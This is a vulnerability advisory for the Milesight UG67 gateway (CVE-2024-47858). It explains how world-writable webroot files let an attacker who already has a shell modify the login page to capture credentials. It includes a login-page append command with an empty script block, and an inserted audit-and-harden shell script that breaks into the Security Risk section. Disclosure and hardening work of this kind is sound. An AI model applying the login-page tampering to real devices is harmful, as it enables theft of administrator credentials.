# Advisory: Milesight UG67: World Writeable Webroot Allows for Privilege Escalation

Attackers with any user account on a Milesight UG67 LoRaWAN Gateway can gain full root access by manipulation of the webroot.

### Details

- Product: Milesight UG67 Outdoor LoRaWAN Gateway
- Affected Versions: 60.0.0.42-r5, likely others
- Fixed Versions: 60.0.0.44
- Vulnerability Type: Local Privilege Escalation
- Security Risk: low
- Vendor URL: https://www.milesight.com/iot/product/lorawan-gateway/ug67
- Vendor Status: fixed version released
- Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2024-005
- Advisory Status: published
- CVE: CVE-2024-47858
- CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47858

### Introduction

The Milesight UG67 is a robust outdoor LoRaWAN® gateway designed for outdoor deployments.

### More Details

Attackers with access to any user account on a Milesight UG67 LoRaWAN Gateway can modify the source files of the web interface, which makes it possible to send all credentials entered via the web interface, including those of administrative accounts, to an attacker-controlled system.

### Proof of Concept

Any user account with the ability to perform arbitrary commands on the gateway (see for example [rt-sa-2024-003](https://www.redteam-pentesting.de/advisories/rt-sa-2024-003) on how to gain command execution via PostgreSQL) has read and write access to the webroot (located at `/www/`) of the web interface, since the corresponding source files are world-modifiable:

```
root@GATEWAY:/www# ps | grep uhttpd
 3450 root     13892 S    /sbin/uhttpd -f -w 1800 -h /www -r GATEWAY -x /cgi-bin -u /cgi -t 1800 -T 30 -k 20 -A 1 -n 3 -N 100 -D -R -p 127.0.0.1:17080 -p [::1]:17080 -C /etc/https.crt -K /etc/https.key -s 127.0.0.1:17443 -s [::1]:17443
root@GATEWAY:/www# ls -la
drwxr-xr-x    1 root     root          4096 May  7 23:36 .
drwxr-xr-x    1 root     root          4096 Apr 29 22:42 ..
drwxr-xr-x    1 root     root          4096 May  7 23:21 cgi-bin
drwxrwxrwx    2 root     root           374 Feb 19 20:37 css
drwxrwxrwx    3 root     root            26 Feb 19 20:37 dist
-rw-rw-rw-    1 root     root          1107 Feb 19 09:15 example.html
drwxrwxrwx    2 root     root          1073 Feb 19 20:37 images
-rw-rw-rw-    1 root     root        854674 Feb 19 09:15 index.html
-rw-rw-rw-    1 root     root          8164 Feb 19 09:15 index_mobile.html
drwxrwxrwx    2 root     root           743 Feb 19 20:37 js
drwxrwxrwx    2 root     root           157 Feb 19 20:37 lang
drwxr-xr-x    1 root     root          4096 May  7 21:45 log
-rw-rw-rw-    1 root     root        272918 May  7 23:53 login.html
-rw-rw-rw-    1 root     root          1719 Feb 19 09:15 login_mobile.html
drwxrwxrwx   11 root     root           197 Feb 19 20:37 view
```

This enables attackers to modify the login page, for example by adding a script component that sends credentials to an attacker-controlled system. The following example was used as proof of concept:

```
```

The following command edits the login page in-place and adds the script above. While this appends the script after the closing `` tag, common browsers will still execute it:

```
echo '' >> /www/login.html
```

As a consequence, all credentials entered into the web interface after compromise, including those of administrative accounts, can be collected by attackers.

### Workaround

Manually change the file permissions of the HTML source files of the web interface to remove write access for all users.

### Fix

The default file permissions for the HTML source files of the web interface should be fixed to restrict access to only those accounts that actually require access.

### Security Risk

Attackers who are able to execute arbitrary commands on a Milesight UG67 LoRaWAN Gateway can collect valid user credentials by modifying the webroot of the web interface. If login details of an administrative user can be obtained, this allows attackers to completely take over the device and extract all configured secrets.
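The condition described in this advisory (entries below the uhttpd document root that are writable by every user) can be audited, and the workaround applied, with a script like the following. This is an added example, not part of the advisory or of the vendor's firmware; the only value taken from the advisory is the default webroot path `/www`.

```sh
#!/bin/sh
# Added example, not part of the advisory or the vendor's firmware: audit a
# webroot for entries writable by "other" and apply the advisory's workaround,
# i.e. drop write access for group and others while keeping everything else.
# /www is the uhttpd document root named in the advisory ("-h /www").

WEBROOT_DEFAULT=/www

# List every file or directory below $1 whose others-write bit is set.
# "-perm -002" matches when that bit is set, whatever the remaining bits are.
find_world_writable() {
    find "$1" -perm -002 2>/dev/null | sort
}

# Number of world-writable entries below $1 (0 when the tree is clean).
count_world_writable() {
    find "$1" -perm -002 2>/dev/null | wc -l | tr -d ' '
}

# Report findings; exit status 0 means clean, 1 means at least one hit.
check_webroot() {
    dir="${1:-$WEBROOT_DEFAULT}"
    hits="$(find_world_writable "$dir")"
    if [ -n "$hits" ]; then
        echo "world-writable entries under $dir:"
        echo "$hits"
        return 1
    fi
    echo "no world-writable entries under $dir"
    return 0
}

# Workaround: remove write permission for group and others on every hit.
# Only the write bit is touched, so directories stay traversable for the
# web server and the owner (root) keeps its write access.
harden_webroot() {
    dir="${1:-$WEBROOT_DEFAULT}"
    find "$dir" -perm -002 -exec chmod go-w {} + 2>/dev/null
}
```

On the gateway, `check_webroot` confirms whether the affected permissions are present and `harden_webroot` applies the workaround; running `check_webroot` again afterwards (and after firmware updates) verifies that the webroot stayed read-only for non-root users.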
Since all accounts except the root account only have a limited shell configured, which does not allow executing arbitrary commands, this attack requires another vulnerability (like [rt-sa-2024-003](https://www.redteam-pentesting.de/advisories/rt-sa-2024-003)) to gain shell access. The attack furthermore requires user interaction, since an administrative user has to authenticate to the web interface, or perform an equivalent action that results in observable ubus traffic, while the device is compromised. In combination these vulnerabilities pose a medium risk.

### Timeline

- 2024-04-25 Vulnerability identified
- 2024-04-29 Customer approved disclosure to vendor
- 2024-05-14 Vendor notified
- 2024-06-28 Asked vendor for update
- 2024-07-03 Vendor will provide update by end of July
- 2024-07-24 Asked vendor for update
- 2024-07-30 Vendor stated: Work in progress
- 2024-08-09 Vendor stated: Fix expected Q3/24
- 2024-09-24 CVE ID requested
- 2024-09-24 Asked vendor for update
- 2024-09-24 Vendor stated: Fix in 60.0.0.44
- 2024-10-04 CVE ID assigned
- 2024-10-07 Asked vendor for update
- 2024-10-08 Vendor stated: Fix will be available mid-October
- 2024-10-18 Asked vendor for update
- 2024-10-21 Vendor stated: Fix will be available mid-November
- 2024-11-04 Vendor released fixed version for testing
- 2024-11-05 Vendor released fixed version
- 2024-12-10 Customer approved public release of vulnerability details
- 2024-12-10 Advisory released

### RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. In this way, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at:

### Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested, please visit: